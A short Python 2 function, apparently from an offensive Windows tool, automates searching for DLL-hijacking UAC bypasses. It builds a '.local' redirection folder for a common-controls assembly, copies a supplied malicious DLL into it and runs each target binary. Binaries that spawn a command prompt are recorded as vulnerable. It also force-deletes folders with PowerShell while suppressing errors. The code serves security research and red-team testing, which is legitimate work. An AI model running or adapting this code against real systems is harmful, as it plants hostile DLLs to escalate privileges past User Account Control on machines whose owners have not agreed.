def handle_dll_local(self, subpath, binary):
path = subpath + "\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.15063.0_none_583b8639f462029f\\"
try:
try:
subprocess.check_call(
["powershell", "-C", "rm", "-r", "-Force", subpath, "-erroraction", "'silentlycontinue'"])
except:
pass
print "[+] Creating: " + path
subprocess.check_call(
["powershell", "-C", "mkdir", path, ">", "$null"])
print "[+] Copying the malicious dll to the path"
subprocess.check_call(
["powershell", "-C", "cp", self.args["malicious_dll"], path])
prev_pids = psutil.pids()
print "[*] Executing the binary"
subprocess.check_call(["powershell", "-C", binary])
time.sleep(1)
if self.is_cmd_open(prev_pids):
print colored("[*] THIS BINARY IS VULNERABLE TO DLL HIJACKING UAC BYPASS!", 'cyan', attrs=['bold'])
if binary not in self._results["vulnerables"]:
self._results["vulnerables"].append(binary)
else:
if binary not in self._results['sospechosos']:
self._results['sospechosos'].append(binary)
new_pids = psutil.pids()
self.kill(binary, prev_pids, new_pids)
print "[-] Deleting the path and cleaning up\n"
subprocess.check_call(
["powershell", "-C", "rm", "-r", "-Force", subpath])
except subprocess.CalledProcessError as error:
print "ERROR: COPYING THE FILE"
评论列表
文章目录
